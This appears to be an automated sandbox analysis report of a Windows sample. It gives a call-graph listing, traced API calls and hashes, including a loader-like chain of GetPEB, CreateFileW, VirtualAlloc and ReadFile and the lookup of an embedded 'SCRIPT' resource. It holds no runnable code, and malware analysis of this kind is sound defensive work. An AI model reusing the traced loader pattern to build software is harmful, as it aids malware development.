96991->96993 96992->96993 96993->96897 96995 c53d90 96994->96995 96996 c1512e 96994->96996 97000 c3ece3 96996->97000 96999->96902 97003 c3eaaa 97000->97003 97002 c1513c 97002->96897 97004 c3eab6 ___scrt_is_nonwritable_in_current_image 97003->97004 97005 c3eac2 97004->97005 97007 c3eae8 97004->97007 97016 c3f2d9 20 API calls _free 97005->97016 97018 c3918d EnterCriticalSection 97007->97018 97008 c3eac7 97017 c427ec 26 API calls pre_c_initialization 97008->97017 97010 c3eaf4 97019 c3ec0a 62 API calls 2 library calls 97010->97019 97013 c3eb08 97020 c3eb27 LeaveCriticalSection __fread_nolock 97013->97020 97015 c3ead2 __wsopen_s 97015->97002 97016->97008 97017->97015 97018->97010 97019->97013 97020->97015 97024 c3e8e1 97021->97024 97023 c15118 97023->96914 97025 c3e8ed ___scrt_is_nonwritable_in_current_image 97024->97025 97026 c3e900 ___scrt_fastfail 97025->97026 97027 c3e92d 97025->97027 97028 c3e925 __wsopen_s 97025->97028 97037 c3f2d9 20 API calls _free 97026->97037 97039 c3918d EnterCriticalSection 97027->97039 97028->97023 97031 c3e937 97040 c3e6f8 38 API calls 4 library calls 97031->97040 97032 c3e91a 97038 c427ec 26 API calls pre_c_initialization 97032->97038 97034 c3e94e 97041 c3e96c LeaveCriticalSection __fread_nolock 97034->97041 97037->97032 97038->97028 97039->97031 97040->97034 97041->97028 97045 c3e4e8 97042->97045 97044 c8275d 97044->96916 97048 c3e469 97045->97048 97047 c3e505 97047->97044 97049 c3e478 97048->97049 97050 c3e48c 97048->97050 97056 c3f2d9 20 API calls _free 97049->97056 97055 c3e488 __alldvrm 97050->97055 97058 c4333f 11 API calls 2 library calls 97050->97058 97052 c3e47d 97057 c427ec 26 API calls pre_c_initialization 97052->97057 97055->97047 97056->97052 97057->97055 97058->97055 97064 c82e7a 97059->97064 97060 c150f5 40 API calls 97060->97064 97061 c82d3b 97061->96826 97061->96843 97062 c828fe 27 API calls 97062->97064 97063 c1511f 64 API calls 97063->97064 97064->97060 97064->97061 97064->97062 97064->97063 97066 c822e7 97065->97066 
97067 c822d9 97065->97067 97069 c8232c 97066->97069 97070 c3e5eb 29 API calls 97066->97070 97093 c822f0 97066->97093 97068 c3e5eb 29 API calls 97067->97068 97068->97066 97094 c82557 40 API calls __fread_nolock 97069->97094 97071 c82311 97070->97071 97071->97069 97073 c8231a 97071->97073 97073->97093 97102 c3e678 97073->97102 97074 c82370 97075 c82374 97074->97075 97076 c82395 97074->97076 97079 c82381 97075->97079 97081 c3e678 67 API calls 97075->97081 97095 c82171 97076->97095 97082 c3e678 67 API calls 97079->97082 97079->97093 97080 c8239d 97083 c823c3 97080->97083 97084 c823a3 97080->97084 97081->97079 97082->97093 97115 c823f3 74 API calls 97083->97115 97086 c823b0 97084->97086 97087 c3e678 67 API calls 97084->97087 97088 c3e678 67 API calls 97086->97088 97086->97093 97087->97086 97088->97093 97089 c823de 97092 c3e678 67 API calls 97089->97092 97089->97093 97090 c823ca 97090->97089 97091 c3e678 67 API calls 97090->97091 97091->97089 97092->97093 97093->96843 97094->97074 97096 c3ea0c ___std_exception_copy 21 API calls 97095->97096 97097 c8217f 97096->97097 97098 c3ea0c ___std_exception_copy 21 API calls 97097->97098 97099 c82190 97098->97099 97100 c3ea0c ___std_exception_copy 21 API calls 97099->97100 97101 c8219c 97100->97101 97101->97080 97103 c3e684 ___scrt_is_nonwritable_in_current_image 97102->97103 97104 c3e695 97103->97104 97105 c3e6aa 97103->97105 97133 c3f2d9 20 API calls _free 97104->97133 97114 c3e6a5 __wsopen_s 97105->97114 97116 c3918d EnterCriticalSection 97105->97116 97107 c3e69a 97134 c427ec 26 API calls pre_c_initialization 97107->97134 97110 c3e6c6 97117 c3e602 97110->97117 97112 c3e6d1 97135 c3e6ee LeaveCriticalSection __fread_nolock 97112->97135 97114->97093 97115->97090 97116->97110 97118 c3e624 97117->97118 97119 c3e60f 97117->97119 97131 c3e61f 97118->97131 97136 c3dc0b 97118->97136 97168 c3f2d9 20 API calls _free 97119->97168 97121 c3e614 97169 c427ec 26 API calls pre_c_initialization 97121->97169 97128 c3e646 97153 c4862f 97128->97153 
97131->97112 97132 c429c8 _free 20 API calls 97132->97131 97133->97107 97134->97114 97135->97114 97137 c3dc23 97136->97137 97141 c3dc1f 97136->97141 97138 c3d955 __fread_nolock 26 API calls 97137->97138 97137->97141 97139 c3dc43 97138->97139 97170 c459be 62 API calls 5 library calls 97139->97170 97142 c44d7a 97141->97142 97143 c44d90 97142->97143 97145 c3e640 97142->97145 97144 c429c8 _free 20 API calls 97143->97144 97143->97145 97144->97145 97146 c3d955 97145->97146 97147 c3d961 97146->97147 97148 c3d976 97146->97148 97171 c3f2d9 20 API calls _free 97147->97171 97148->97128 97150 c3d966 97172 c427ec 26 API calls pre_c_initialization 97150->97172 97152 c3d971 97152->97128 97154 c4863e 97153->97154 97156 c48653 97153->97156 97176 c3f2c6 20 API calls _free 97154->97176 97157 c4868e 97156->97157 97162 c4867a 97156->97162 97178 c3f2c6 20 API calls _free 97157->97178 97159 c48643 97177 c3f2d9 20 API calls _free 97159->97177 97160 c48693 97179 c3f2d9 20 API calls _free 97160->97179 97173 c48607 97162->97173 97165 c3e64c 97165->97131 97165->97132 97166 c4869b 97180 c427ec 26 API calls pre_c_initialization 97166->97180 97168->97121 97169->97131 97170->97141 97171->97150 97172->97152 97181 c48585 97173->97181 97175 c4862b 97175->97165 97176->97159 97177->97165 97178->97160 97179->97166 97180->97165 97182 c48591 ___scrt_is_nonwritable_in_current_image 97181->97182 97192 c45147 EnterCriticalSection 97182->97192 97184 c4859f 97185 c485c6 97184->97185 97186 c485d1 97184->97186 97193 c486ae 97185->97193 97208 c3f2d9 20 API calls _free 97186->97208 97189 c485cc 97209 c485fb LeaveCriticalSection __wsopen_s 97189->97209 97191 c485ee __wsopen_s 97191->97175 97192->97184 97210 c453c4 97193->97210 97195 c486c4 97223 c45333 21 API calls 3 library calls 97195->97223 97196 c486be 97196->97195 97198 c453c4 __wsopen_s 26 API calls 97196->97198 97206 c486f6 97196->97206 97201 c486ed 97198->97201 97199 c453c4 __wsopen_s 26 API calls 97202 c48702 CloseHandle 97199->97202 97200 c4871c 97207 
c4873e 97200->97207 97224 c3f2a3 20 API calls 2 library calls 97200->97224 97203 c453c4 __wsopen_s 26 API calls 97201->97203 97202->97195 97204 c4870e GetLastError 97202->97204 97203->97206 97204->97195 97206->97195 97206->97199 97207->97189 97208->97189 97209->97191 97211 c453e6 97210->97211 97212 c453d1 97210->97212 97214 c3f2c6 __dosmaperr 20 API calls 97211->97214 97218 c4540b 97211->97218 97213 c3f2c6 __dosmaperr 20 API calls 97212->97213 97215 c453d6 97213->97215 97216 c45416 97214->97216 97217 c3f2d9 _free 20 API calls 97215->97217 97219 c3f2d9 _free 20 API calls 97216->97219 97220 c453de 97217->97220 97218->97196 97221 c4541e 97219->97221 97220->97196 97222 c427ec pre_c_initialization 26 API calls 97221->97222 97222->97220 97223->97200 97224->97207 97225 c1dee5 97228 c1b710 97225->97228 97229 c1b72b 97228->97229 97230 c60146 97229->97230 97231 c600f8 97229->97231 97238 c1b750 97229->97238 97294 c958a2 207 API calls 2 library calls 97230->97294 97234 c60102 97231->97234 97236 c6010f 97231->97236 97231->97238 97292 c95d33 207 API calls 97234->97292 97255 c1ba20 97236->97255 97293 c961d0 207 API calls 2 library calls 97236->97293 97242 c1bbe0 40 API calls 97238->97242 97243 c2d336 40 API calls 97238->97243 97247 c60322 97238->97247 97251 c1ba4e 97238->97251 97238->97255 97257 c1a8c7 22 API calls 97238->97257 97259 c1ec40 97238->97259 97283 c1a81b 41 API calls 97238->97283 97284 c2d2f0 40 API calls 97238->97284 97285 c2a01b 207 API calls 97238->97285 97286 c30242 5 API calls __Init_thread_wait 97238->97286 97287 c2edcd 22 API calls 97238->97287 97288 c300a3 29 API calls __onexit 97238->97288 97289 c301f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97238->97289 97290 c2ee53 82 API calls 97238->97290 97291 c2e5ca 207 API calls 97238->97291 97295 c1aceb 23 API calls messages 97238->97295 97296 c6f6bf 23 API calls 97238->97296 97242->97238 97243->97238 97244 c603d9 97244->97244 97297 c95c0c 82 API calls 97247->97297 97255->97251 97298 c8359c 82 
API calls __wsopen_s 97255->97298 97257->97238 97279 c1ec76 messages 97259->97279 97260 c30242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 97260->97279 97261 c300a3 29 API calls pre_c_initialization 97261->97279 97262 c301f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 97262->97279 97264 c2fddb 22 API calls 97264->97279 97265 c1fef7 97272 c1a8c7 22 API calls 97265->97272 97277 c1ed9d messages 97265->97277 97267 c64b0b 97302 c8359c 82 API calls __wsopen_s 97267->97302 97268 c1a8c7 22 API calls 97268->97279 97269 c64600 97273 c1a8c7 22 API calls 97269->97273 97269->97277 97272->97277 97273->97277 97275 c1fbe3 97275->97277 97278 c64bdc 97275->97278 97282 c1f3ae messages 97275->97282 97276 c1a961 22 API calls 97276->97279 97277->97238 97303 c8359c 82 API calls __wsopen_s 97278->97303 97279->97260 97279->97261 97279->97262 97279->97264 97279->97265 97279->97267 97279->97268 97279->97269 97279->97275 97279->97276 97279->97277 97281 c64beb 97279->97281 97279->97282 97299 c201e0 207 API calls 2 library calls 97279->97299 97300 c206a0 41 API calls messages 97279->97300 97304 c8359c 82 API calls __wsopen_s 97281->97304 97282->97277 97301 c8359c 82 API calls __wsopen_s 97282->97301 97283->97238 97284->97238 97285->97238 97286->97238 97287->97238 97288->97238 97289->97238 97290->97238 97291->97238 97292->97236 97293->97255 97294->97238 97295->97238 97296->97238 97297->97255 97298->97244 97299->97279 97300->97279 97301->97277 97302->97277 97303->97281 97304->97277 97305 c11044 97310 c110f3 97305->97310 97307 c1104a 97346 c300a3 29 API calls __onexit 97307->97346 97309 c11054 97347 c11398 97310->97347 97314 c1116a 97315 c1a961 22 API calls 97314->97315 97316 c11174 97315->97316 97317 c1a961 22 API calls 97316->97317 97318 c1117e 97317->97318 97319 c1a961 22 API calls 97318->97319 97320 c11188 97319->97320 97321 c1a961 22 API calls 97320->97321 97322 c111c6 97321->97322 97323 
c1a961 22 API calls 97322->97323 97324 c11292 97323->97324 97357 c1171c 97324->97357 97328 c112c4 97329 c1a961 22 API calls 97328->97329 97330 c112ce 97329->97330 97378 c21940 97330->97378 97332 c112f9 97388 c11aab 97332->97388 97334 c11315 97335 c11325 GetStdHandle 97334->97335 97336 c52485 97335->97336 97337 c1137a 97335->97337 97336->97337 97338 c5248e 97336->97338 97340 c11387 OleInitialize 97337->97340 97339 c2fddb 22 API calls 97338->97339 97341 c52495 97339->97341 97340->97307 97395 c8011d InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 97341->97395 97343 c5249e 97396 c80944 CreateThread 97343->97396 97345 c524aa CloseHandle 97345->97337 97346->97309 97397 c113f1 97347->97397 97350 c113f1 22 API calls 97351 c113d0 97350->97351 97352 c1a961 22 API calls 97351->97352 97353 c113dc 97352->97353 97354 c16b57 22 API calls 97353->97354 97355 c11129 97354->97355 97356 c11bc3 6 API calls 97355->97356 97356->97314 97358 c1a961 22 API calls 97357->97358 97359 c1172c 97358->97359 97360 c1a961 22 API calls 97359->97360 97361 c11734 97360->97361 97362 c1a961 22 API calls 97361->97362 97363 c1174f 97362->97363 97364 c2fddb 22 API calls 97363->97364 97365 c1129c 97364->97365 97366 c11b4a 97365->97366 97367 c11b58 97366->97367 97368 c1a961 22 API calls 97367->97368 97369 c11b63 97368->97369 97370 c1a961 22 API calls 97369->97370 97371 c11b6e 97370->97371 97372 c1a961 22 API calls 97371->97372 97373 c11b79 97372->97373 97374 c1a961 22 API calls 97373->97374 97375 c11b84 97374->97375 97376 c2fddb 22 API calls 97375->97376 97377 c11b96 RegisterWindowMessageW 97376->97377 97377->97328 97379 c21981 97378->97379 97380 c2195d 97378->97380 97404 c30242 5 API calls __Init_thread_wait 97379->97404 97387 c2196e 97380->97387 97406 c30242 5 API calls __Init_thread_wait 97380->97406 97382 c2198b 97382->97380 97405 c301f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97382->97405 97384 c28727 97384->97387 97407 
c301f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97384->97407 97387->97332 97389 c5272d 97388->97389 97390 c11abb 97388->97390 97408 c83209 23 API calls 97389->97408 97391 c2fddb 22 API calls 97390->97391 97394 c11ac3 97391->97394 97393 c52738 97394->97334 97395->97343 97396->97345 97409 c8092a 28 API calls 97396->97409 97398 c1a961 22 API calls 97397->97398 97399 c113fc 97398->97399 97400 c1a961 22 API calls 97399->97400 97401 c11404 97400->97401 97402 c1a961 22 API calls 97401->97402 97403 c113c6 97402->97403 97403->97350 97404->97382 97405->97380 97406->97384 97407->97387 97408->97393 97410 14e226b 97413 14e1ee0 97410->97413 97412 14e22b7 97426 14df910 97413->97426 97415 14e1f7f 97418 14e1fd9 VirtualAlloc 97415->97418 97421 14e1fbd 97415->97421 97424 14e20e0 CloseHandle 97415->97424 97425 14e20f0 VirtualFree 97415->97425 97429 14e2df0 GetPEB 97415->97429 97417 14e1fb0 CreateFileW 97417->97415 97417->97421 97419 14e1ffa ReadFile 97418->97419 97418->97421 97420 14e2018 VirtualAlloc 97419->97420 97419->97421 97420->97415 97420->97421 97422 14e21cc VirtualFree 97421->97422 97423 14e21da 97421->97423 97422->97423 97423->97412 97424->97415 97425->97415 97431 14e2d90 GetPEB 97426->97431 97428 14dff9b 97428->97415 97430 14e2e1a 97429->97430 97430->97417 97432 14e2dba 97431->97432 97432->97428 97433 c62a00 97434 c1d7b0 messages 97433->97434 97435 c1db11 PeekMessageW 97434->97435 97436 c1d807 GetInputState 97434->97436 97437 c1d9d5 97434->97437 97438 c61cbe TranslateAcceleratorW 97434->97438 97440 c1db8f PeekMessageW 97434->97440 97441 c1da04 timeGetTime 97434->97441 97442 c1db73 TranslateMessage DispatchMessageW 97434->97442 97443 c1dbaf Sleep 97434->97443 97444 c62b74 Sleep 97434->97444 97446 c61dda timeGetTime 97434->97446 97460 c1ec40 207 API calls 97434->97460 97465 c1dd50 97434->97465 97472 c1dfd0 97434->97472 97495 c21310 97434->97495 97551 c1bf40 207 API calls 2 library calls 97434->97551 97552 c2edf6 IsDialogMessageW GetClassLongW 97434->97552 
97554 c83a2a 23 API calls 97434->97554 97555 c8359c 82 API calls __wsopen_s 97434->97555 97435->97434 97436->97434 97436->97435 97438->97434 97440->97434 97441->97434 97442->97440 97461 c1dbc0 97443->97461 97444->97461 97445 c2e551 timeGetTime 97445->97461 97553 c2e300 23 API calls 97446->97553 97449 c62c0b GetExitCodeProcess 97452 c62c37 CloseHandle 97449->97452 97453 c62c21 WaitForSingleObject 97449->97453 97450 ca29bf GetForegroundWindow 97450->97461 97452->97461 97453->97434 97453->97452 97454 c62a31 97454->97437 97455 c62ca9 Sleep 97455->97434 97460->97434 97461->97434 97461->97437 97461->97445 97461->97449 97461->97450 97461->97454 97461->97455 97556 c95658 23 API calls 97461->97556 97557 c7e97b QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 97461->97557 97558 c7d4dc 47 API calls 97461->97558 97466 c1dd83 97465->97466 97467 c1dd6f 97465->97467 97560 c8359c 82 API calls __wsopen_s 97466->97560 97559 c1d260 207 API calls 2 library calls 97467->97559 97470 c1dd7a 97470->97434 97471 c62f75 97471->97471 97474 c1e010 97472->97474 97473 c1ec40 207 API calls 97488 c1e0dc messages 97473->97488 97474->97488 97563 c30242 5 API calls __Init_thread_wait 97474->97563 97477 c62fca 97479 c1a961 22 API calls 97477->97479 97477->97488 97478 c1a961 22 API calls 97478->97488 97480 c62fe4 97479->97480 97564 c300a3 29 API calls __onexit 97480->97564 97485 c62fee 97565 c301f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97485->97565 97488->97473 97488->97478 97489 c1a8c7 22 API calls 97488->97489 97490 c8359c 82 API calls 97488->97490 97491 c1e3e1 97488->97491 97492 c204f0 22 API calls 97488->97492 97561 c1a81b 41 API calls 97488->97561 97562 c2a308 207 API calls 97488->97562 97566 c30242 5 API calls __Init_thread_wait 97488->97566 97567 c300a3 29 API calls __onexit 97488->97567 97568 c301f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97488->97568 97569 c947d4 207 API calls 97488->97569 97570 c968c1 207 API 
calls 97488->97570 97489->97488 97490->97488 97491->97434 97492->97488 97496 c217b0 97495->97496 97497 c21376 97495->97497 97728 c30242 5 API calls __Init_thread_wait 97496->97728 97498 c21390 97497->97498 97499 c66331 97497->97499 97501 c21940 9 API calls 97498->97501 97502 c6633d 97499->97502 97687 c9709c 97499->97687 97505 c213a0 97501->97505 97502->97434 97504 c217ba 97506 c217fb 97504->97506 97507 c19cb3 22 API calls 97504->97507 97508 c21940 9 API calls 97505->97508 97510 c66346 97506->97510 97512 c2182c 97506->97512 97515 c217d4 97507->97515 97509 c213b6 97508->97509 97509->97506 97511 c213ec 97509->97511 97733 c8359c 82 API calls __wsopen_s 97510->97733 97511->97510 97517 c21408 __fread_nolock 97511->97517 97730 c1aceb 23 API calls messages 97512->97730 97729 c301f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97515->97729 97516 c21839 97731 c2d217 207 API calls 97516->97731 97517->97516 97520 c6636e 97517->97520 97528 c2fddb 22 API calls 97517->97528 97529 c2fe0b 22 API calls 97517->97529 97534 c1ec40 207 API calls 97517->97534 97536 c2152f 97517->97536 97537 c663b2 97517->97537 97541 c215c7 messages 97517->97541 97734 c8359c 82 API calls __wsopen_s 97520->97734 97522 c663d1 97736 c95745 54 API calls _wcslen 97522->97736 97523 c2153c 97526 c21940 9 API calls 97523->97526 97524 c21872 97732 c2faeb 23 API calls 97524->97732 97527 c21549 97526->97527 97532 c21940 9 API calls 97527->97532 97527->97541 97528->97517 97529->97517 97531 c2171d 97531->97434 97535 c21563 97532->97535 97534->97517 97535->97541 97543 c1a8c7 22 API calls 97535->97543 97536->97522 97536->97523 97735 c8359c 82 API calls __wsopen_s 97537->97735 97538 c21940 9 API calls 97538->97541 97541->97524 97541->97538 97542 c2167b messages 97541->97542 97571 c9958b 97541->97571 97574 c883da 97541->97574 97577 c16246 97541->97577 97581 c16216 97541->97581 97586 c9e204 97541->97586 97622 c8744a 97541->97622 97678 c8f0ec 97541->97678 97737 c8359c 82 API calls __wsopen_s 97541->97737 
97542->97531 97727 c2ce17 22 API calls messages 97542->97727 97543->97541 97551->97434 97552->97434 97553->97434 97554->97434 97555->97434 97556->97461 97557->97461 97558->97461 97559->97470 97560->97471 97561->97488 97562->97488 97563->97477 97564->97485 97565->97488 97566->97488 97567->97488 97568->97488 97569->97488 97570->97488 97738 c97f59 97571->97738 97573 c9959b 97573->97541 97858 c898e3 97574->97858 97576 c883ea 97576->97541 97578 c16250 97577->97578 97579 c1625f 97577->97579 97578->97541 97579->97578 97580 c16264 CloseHandle 97579->97580 97580->97578 97582 c16246 CloseHandle 97581->97582 97583 c1621e 97582->97583 97584 c16246 CloseHandle 97583->97584 97585 c1622d messages 97584->97585 97585->97541 97587 c1a961 22 API calls 97586->97587 97588 c9e21b 97587->97588 97589 c17510 53 API calls 97588->97589 97590 c9e22a 97589->97590 97591 c16270 22 API calls 97590->97591 97592 c9e23d 97591->97592 97593 c17510 53 API calls 97592->97593 97594 c9e24a 97593->97594 97595 c9e262 97594->97595 97596 c9e2c7 97594->97596 97952 c1b567 39 API calls 97595->97952 97598 c17510 53 API calls 97596->97598 97600 c9e2cc 97598->97600 97599 c9e267 97601 c9e2d9 97599->97601 97604 c9e280 97599->97604 97600->97601 97602 c9e314 97600->97602 97955 c19c6e 22 API calls 97601->97955 97605 c9e32c 97602->97605 97956 c1b567 39 API calls 97602->97956 97953 c16d25 22 API calls __fread_nolock 97604->97953 97608 c9e345 97605->97608 97957 c1b567 39 API calls 97605->97957 97609 c1a8c7 22 API calls 97608->97609 97612 c9e35f 97609->97612 97610 c9e28d 97613 c16350 22 API calls 97610->97613 97933 c792c8 97612->97933 97615 c9e29b 97613->97615 97954 c16d25 22 API calls __fread_nolock 97615->97954 97617 c9e2b4 97618 c16350 22 API calls 97617->97618 97621 c9e2c2 97618->97621 97619 c9e2e6 97619->97541 97958 c162b5 22 API calls 97621->97958 97623 c87469 97622->97623 97624 c87474 97622->97624 97962 c1b567 39 API calls 97623->97962 97627 c1a961 22 API calls 97624->97627 97662 c87554 97624->97662 97626 c2fddb 22 
API calls 97628 c87587 97626->97628 97629 c87495 97627->97629 97630 c2fe0b 22 API calls 97628->97630 97631 c1a961 22 API calls 97629->97631 97632 c87598 97630->97632 97633 c8749e 97631->97633 97634 c16246 CloseHandle 97632->97634 97635 c17510 53 API calls 97633->97635 97636 c875a3 97634->97636 97637 c874aa 97635->97637 97638 c1a961 22 API calls 97636->97638 97963 c1525f 22 API calls 97637->97963 97640 c875ab 97638->97640 97642 c16246 CloseHandle 97640->97642 97641 c874bf 97643 c16350 22 API calls 97641->97643 97644 c875b2 97642->97644 97645 c874f2 97643->97645 97646 c17510 53 API calls 97644->97646 97648 c8754a 97645->97648 97964 c7d4ce lstrlenW GetFileAttributesW FindFirstFileW FindClose 97645->97964 97647 c875be 97646->97647 97649 c16246 CloseHandle 97647->97649 97966 c1b567 39 API calls 97648->97966 97651 c875c8 97649->97651 97655 c15745 5 API calls 97651->97655 97653 c87502 97653->97648 97654 c87506 97653->97654 97656 c19cb3 22 API calls 97654->97656 97658 c875e2 97655->97658 97657 c87513 97656->97657 97965 c7d2c1 26 API calls 97657->97965 97660 c875ea 97658->97660 97661 c876de GetLastError 97658->97661 97967 c153de 27 API calls messages 97660->97967 97663 c876f7 97661->97663 97662->97626 97676 c876a4 97662->97676 97665 c16216 CloseHandle 97663->97665 97665->97676 97666 c8751c 97666->97648 97667 c875f8 97968 c153c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 97667->97968 97669 c87645 97671 c2fddb 22 API calls 97669->97671 97670 c875ff 97670->97669 97673 c7ccff 4 API calls 97670->97673 97672 c87679 97671->97672 97674 c1a961 22 API calls 97672->97674 97673->97669 97675 c87686 97674->97675 97675->97676 97969 c7417d 22 API calls __fread_nolock 97675->97969 97676->97541 97679 c17510 53 API calls 97678->97679 97680 c8f126 97679->97680 97970 c19e90 97680->97970 97682 c8f136 97683 c8f15b 97682->97683 97684 c1ec40 207 API calls 97682->97684 97686 c8f15f 97683->97686 97998 c19c6e 22 API calls 97683->97998 97684->97683 97686->97541 97688 c970db 97687->97688 97689 
c970f5 97687->97689 98017 c8359c 82 API calls __wsopen_s 97688->98017 98006 c95689 97689->98006 97693 c1ec40 206 API calls 97694 c97164 97693->97694 97695 c971ff 97694->97695 97698 c970ed 97694->97698 97700 c971a6 97694->97700 97696 c97253 97695->97696 97697 c97205 97695->97697 97696->97698 97699 c17510 53 API calls 97696->97699 98018 c81119 22 API calls 97697->98018 97698->97502 97701 c97265 97699->97701 97705 c80acc 22 API calls 97700->97705 97703 c1aec9 22 API calls 97701->97703 97707 c97289 CharUpperBuffW 97703->97707 97704 c97228 98019 c1a673 22 API calls 97704->98019 97706 c971de 97705->97706 97709 c21310 206 API calls 97706->97709 97710 c972a3 97707->97710 97709->97698 97711 c972aa 97710->97711 97712 c972f6 97710->97712 98013 c80acc 97711->98013 97714 c17510 53 API calls 97712->97714 97713 c97230 98020 c1bf40 207 API calls 2 library calls 97713->98020 97716 c972fe 97714->97716 98021 c2e300 23 API calls 97716->98021 97720 c21310 206 API calls 97720->97698 97721 c97308 97721->97698 97722 c17510 53 API calls 97721->97722 97723 c97323 97722->97723 98022 c1a673 22 API calls 97723->98022 97725 c97333 98023 c1bf40 207 API calls 2 library calls 97725->98023 97727->97542 97728->97504 97729->97506 97730->97516 97731->97524 97732->97524 97733->97541 97734->97541 97735->97541 97736->97535 97737->97541 97776 c17510 97738->97776 97742 c98281 97743 c9844f 97742->97743 97748 c9828f 97742->97748 97840 c98ee4 60 API calls 97743->97840 97746 c9845e 97747 c9846a 97746->97747 97746->97748 97762 c97fd5 messages 97747->97762 97812 c97e86 97748->97812 97749 c17510 53 API calls 97766 c98049 97749->97766 97754 c982c8 97827 c2fc70 97754->97827 97757 c982e8 97833 c8359c 82 API calls __wsopen_s 97757->97833 97758 c98302 97834 c163eb 22 API calls 97758->97834 97761 c98311 97835 c16a50 22 API calls 97761->97835 97762->97573 97763 c982f3 GetCurrentProcess TerminateProcess 97763->97758 97765 c9832a 97774 c98352 97765->97774 97836 c204f0 22 API calls 97765->97836 97766->97742 97766->97749 

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • GetVersionExW.KERNEL32(?), ref: 00C1430D
                                                                                        • Part of subcall function 00C16B57: _wcslen.LIBCMT ref: 00C16B6A
                                                                                      • GetCurrentProcess.KERNEL32(?,00CACB64,00000000,?,?), ref: 00C14422
                                                                                      • IsWow64Process.KERNEL32(00000000,?,?), ref: 00C14429
                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00C14454
                                                                                      • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00C14466
                                                                                      • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00C14474
                                                                                      • FreeLibrary.KERNEL32(00000000,?,?), ref: 00C1447B
                                                                                      • GetSystemInfo.KERNEL32(?,?,?), ref: 00C144A0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                                      • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                                      • API String ID: 3290436268-3101561225
                                                                                      • Opcode ID: 9054fbac982b842a12c3b1c6c8d7eca24878a2d8242a3588b87d5245ace48925
                                                                                      • Instruction ID: 00ec2336ef1c543ad38023a5fa6d034a1c7892a599ea07c86de51bba0ab7d87e
                                                                                      • Opcode Fuzzy Hash: 9054fbac982b842a12c3b1c6c8d7eca24878a2d8242a3588b87d5245ace48925
                                                                                      • Instruction Fuzzy Hash: 14A1AF7A91A2C0CFC715C76978C07DD7FE46B27740B0C4899EC919BA32D2304AA8EB35

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00C150AA,?,?,00000000,00000000), ref: 00C142B2
                                                                                      • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00C150AA,?,?,00000000,00000000), ref: 00C142C9
                                                                                      • LoadResource.KERNEL32(?,00000000,?,?,00C150AA,?,?,00000000,00000000,?,?,?,?,?,?,00C14F20), ref: 00C535BE
                                                                                      • SizeofResource.KERNEL32(?,00000000,?,?,00C150AA,?,?,00000000,00000000,?,?,?,?,?,?,00C14F20), ref: 00C535D3
                                                                                      • LockResource.KERNEL32(00C150AA,?,?,00C150AA,?,?,00000000,00000000,?,?,?,?,?,?,00C14F20,?), ref: 00C535E6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                      • String ID: SCRIPT
                                                                                      • API String ID: 3051347437-3967369404
                                                                                      • Opcode ID: a81b450935b30b3287b089d41ece0d4693275a3ad6d6da2d72b8b11fd69739a2
                                                                                      • Instruction ID: 4c0e2933427ecad6c5d3e03e0c0412d0cbe54eecea7ad962aab9cb8bd1a80479
                                                                                      • Opcode Fuzzy Hash: a81b450935b30b3287b089d41ece0d4693275a3ad6d6da2d72b8b11fd69739a2
                                                                                      • Instruction Fuzzy Hash: 9C118E74200701BFD7258B65DC88F6B7BBAEBC6B55F104269F412D7290DB71DD809630

Control-flow Graph

APIs
• SetCurrentDirectoryW.KERNEL32(?), ref: 00C12B6B
